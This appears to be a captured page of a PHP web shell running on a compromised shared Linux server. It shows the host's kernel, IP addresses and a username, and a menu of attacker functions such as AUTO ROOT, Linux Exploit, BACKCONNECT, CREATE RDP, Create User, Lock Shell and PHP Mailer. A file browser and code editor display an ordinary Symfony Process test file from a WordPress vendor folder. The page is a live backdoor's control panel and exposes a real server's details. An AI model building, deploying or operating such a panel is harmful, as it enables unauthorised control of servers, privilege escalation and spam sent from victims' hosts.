Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
process /
Tests /
[ HOME SHELL ]
Name
Size
Permission
Action
ErrorProcessInitiator.php
926
B
-rwxr-xr-x
ExecutableFinderTest.php
4.61
KB
-rw-r--r--
NonStopableProcess.php
1.04
KB
-rw-r--r--
PhpExecutableFinderTest.php
2.13
KB
-rw-r--r--
PhpProcessTest.php
1.28
KB
-rw-r--r--
PipeStdinInStdoutStdErrStreamS...
1.71
KB
-rw-r--r--
ProcessBuilderTest.php
6.65
KB
-rw-r--r--
ProcessFailedExceptionTest.php
4.52
KB
-rw-r--r--
ProcessTest.php
48.27
KB
-rw-r--r--
ProcessUtilsTest.php
1.39
KB
-rw-r--r--
SignalListener.php
399
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ErrorProcessInitiator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Process\Tests; use Symfony\Component\Process\Exception\ProcessTimedOutException; use Symfony\Component\Process\Process; require \dirname(__DIR__).'/vendor/autoload.php'; list('e' => $php) = getopt('e:') + ['e' => 'php']; try { $process = new Process("exec $php -r \"echo 'ready'; trigger_error('error', E_USER_ERROR);\""); $process->start(); $process->setTimeout(0.5); while (false === strpos($process->getOutput(), 'ready')) { usleep(1000); } $process->signal(\SIGSTOP); $process->wait(); return $process->getExitCode(); } catch (ProcessTimedOutException $t) { echo $t->getMessage().\PHP_EOL; return 1; }
Close